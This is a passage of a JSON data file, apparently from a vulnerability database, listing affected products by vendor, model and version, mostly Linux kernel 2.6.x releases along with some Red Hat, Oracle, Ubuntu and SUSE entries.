        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel 2.6.34-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.40"
      },
      {
        "model": "enterprise linux hpc node optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel 2.6.39-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel 2.6.25-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.22"
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "kernel -rc8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15-27.48"
      },
      {
        "model": "kernel git",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.216"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "project openvz 042stab055.16",
        "scope": null,
        "trust": 0.3,
        "vendor": "openvz",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel 2.6.33-rc6-git5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.28-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.3"
      },
      {
        "model": "kernel 2.6.34-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "enterprise linux workstation optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.12"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel 2.6.20-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel git3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3113"
      },
      {
        "model": "kernel 2.6.32-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.14"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel git",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.217"
      },
      {
        "model": "kernel 2.6.37-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.24-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel 2.6.34-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel 2.6.38-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "kernel 2.6.38-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel 2.6.21-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel -git13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37.2"
      },
      {
        "model": "rapid deployment pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.46"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel 2.6.21-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.26-rc5-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel 2.6.33-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.33-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.52"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "enterprise linux server optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel 2.6.21-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "kernel 2.6.36-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "project openvz 042stab055.10",
        "scope": null,
        "trust": 0.3,
        "vendor": "openvz",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.53"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.41"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.34-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.49"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.28-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "kernel 2.6.35-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.31"
      },
      {
        "model": "kernel 2.6.34-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "enterprise linux desktop optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel 2.6.29-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.32"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "kernel 2.6.38-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.13"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.22"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel 2.6.37rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "linux enterprise desktop sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel 2.6.28-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
